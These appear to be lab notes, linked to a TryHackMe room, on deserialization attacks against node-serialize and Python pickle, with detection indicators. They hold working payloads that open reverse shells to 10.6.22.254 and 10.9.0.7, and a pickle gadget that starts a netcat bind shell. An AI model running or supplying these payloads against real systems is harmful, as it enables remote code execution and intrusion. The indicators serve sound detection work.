original (benign) value:
{"username":"guest","isGuest":false,"encoding": "utf-8"}
attack — each payload swaps one field for a `_$$ND_FUNC$$_`-prefixed function string, the marker the vulnerable node-serialize unserialize() evaluates on load; that prefix is what to look for in logs and request bodies:
{"username":"guest","isGuest":false,"encoding": "_$$ND_FUNC$$_function (){\n \t require('child_process').exec('bash -c \"sh -i >& /dev/tcp/10.6.22.254/3333 0>&1\"')}()"}
{"username":"guest","isGuest":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('bash -c \"sh -i >& /dev/tcp/10.6.22.254/3333 0>&1\"')}()","encoding": "utf-8"}
{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('bash -c \"sh -i >& /dev/tcp/10.6.22.254/3333 0>&1\"')}()","isGuest":false,"encoding": "utf-8"}
or:
{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.7 4444 >/tmp/f","isGuest":false,"encoding": "utf-8"}
...
- source code is not needed for this; the deserializer itself is the sink
- https://tryhackme.com/room/unbakedpie
# Pickle gadget from the room linked above (indentation was lost in the paste).
# Documented here for the defender's point: pickle.loads() on untrusted bytes
# is code execution, because the data itself chooses what gets called.
import pickle, os, base64
class P(object):
# __reduce__ tells pickle how to rebuild the object: return (callable, args).
# pickle.loads() calls that callable on load, so an attacker-controlled pickle
# can name any importable function here (os.system in this example).
def __reduce__(self):
return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
# Emits the base64 form; the decoded bytes start with the 80 04 95 header
# listed in the indicators below, which is the signature to hunt for.
print(base64.b64encode(pickle.dumps(P())))
indicators (serialized-object headers to look for in parameters, cookies and logs):
gASV... # base64 of a python pickle, protocol 4 (decodes to 80 04 95)
80 04 95 # raw python pickle, protocol 4 header
gA... # base64 of a python pickle, protocol 2 or later (decodes to 80 ..)
rO0... # base64 of a java serialized object (decodes to AC ED 00)
ac ed 00 05 # raw java serialization stream header